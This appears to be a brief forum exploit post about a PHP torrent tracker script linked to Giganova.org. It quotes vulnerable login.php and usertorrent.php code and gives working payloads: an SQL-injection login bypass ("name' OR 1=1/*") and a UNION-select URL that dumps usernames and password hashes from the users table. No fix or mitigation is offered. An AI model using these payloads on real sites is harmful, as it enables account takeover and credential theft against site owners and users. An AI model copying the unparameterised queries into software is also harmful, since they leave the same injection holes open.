guibean made it for his site
Giganova.org
but there is no support and there are xxs and sql injection in login.php
Auth bypass -
login.php
Bug func:
Code:
if (isset($_POST['username'])&&isset($_POST['password'])){
$result = mysql_query("SELECT * FROM users WHERE username = '".$_POST['username']."' and password = '".md5($_POST['password'])."' LIMIT 1") or die (mysql_error());
if (mysql_num_rows($result) == 0){
stheader('Login Failed');
login_form($_POST['username'],'Username or password incorrect.');
footer();
exit();
}
Username: name' OR 1=1/*
Password: anything
Sql-inj -
usertorrent.php
Bug func:
Code:
$result2 = mysql_query("SELECT * FROM torrents LEFT JOIN categories ON torrents.subcat = categories.subid WHERE posted_by='".strtolower($_GET['usuario'])."'") or die (mysql_error());
Code:
usertorrent.php?usuario=giga'+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt(concat _ws(0x3a,username,password),0x71),0x71),14,15,16,1 7,18,19,20,21,22+from+users/*